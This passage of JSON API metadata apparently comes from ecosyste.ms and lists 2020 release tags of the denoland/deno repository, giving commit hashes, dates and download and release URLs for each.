itHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{